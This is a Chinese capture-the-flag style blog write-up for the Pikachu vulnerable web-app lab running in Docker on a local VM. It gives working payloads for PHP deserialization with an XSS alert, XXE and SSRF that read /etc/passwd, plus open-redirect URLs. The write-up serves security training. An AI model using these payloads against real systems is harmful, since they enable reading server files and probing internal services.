pikachu靶场(完结)

Posted 2021-08-24 Jach1n

pikachu靶场

环境

虚拟机192.168.48.130
docker+centos8

安装

这里把启动指令写成脚本文件了，方便启动
启动完成后，访问http://your-ip:port，点击初始化安装后按照提示操作即可

docker search pikachu
docker pull area39/pikachu
docker images
vi pikachu.sh
    docker run -dt --name pikachu -p 80:80 --rm area39/pikachu
chmod +x pikachu.sh
./pikachu
docker ps
-----------------------------------------------------------------
docker进入镜像
docker ps  查看containerid
docker exec -it containerid /bin/bash
mysql -u root -p  数据库密码为空密码

php反序列化

直接找个payload来用

O:1:"S":1:{s:4:"test";s:29:"<script>alert(\'xss\')</script>";}
//O:1 O代表object，1代表对象名字长度为1个字符
//S:1 S代表对象的名称，1代表对象里有1个变量
//s 数据类型，4 变量名称长度，test 变量名称

XXE

按照xml文档语法构造payload
读取passwd文件
```html/xml
<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>&xxe;</test>

![image20210709051549420.png](https://s2.51cto.com/images/20210729/1627559718422563.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

# URL重定向

链接后带有url参数，修改url参数为跳转地址即可
![image20210709052110916.png](https://s2.51cto.com/images/20210729/1627559751704863.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

要加http/https，其他几个链接后面没有url参数的加上就可以了
```shell
http://192.168.48.130/vul/urlredirect/urlredirect.php?url=http://www.baidu.com

发送后成功跳转

服务器端请求伪造

服务器端请求伪造(curl)

先开这句话，发现没有诗出来，看了下url好像有些问题，多了个/vul，删除后即可

http://192.168.48.130/vul/***f/***f_curl.php?url=http://127.0.0.1/vul/vul/***f/***f_info/info1.php
http://192.168.48.130/vul/***f/***f_curl.php?url=http://127.0.0.1/vul/***f/***f_info/info1.php

可以通过修改url的参数来实现服务器对其他地址发起请求
访问pikachu服务器的其他端口/访问云服务器的22端口

服务器端请求伪造(file_get_content)

这个同样需要改下url才可以访问到内容

修改url直接访问目录，从 \'file=\' 后开始

http://192.168.48.130/vul/***f/***f_fgc.php?file=///etc/passwd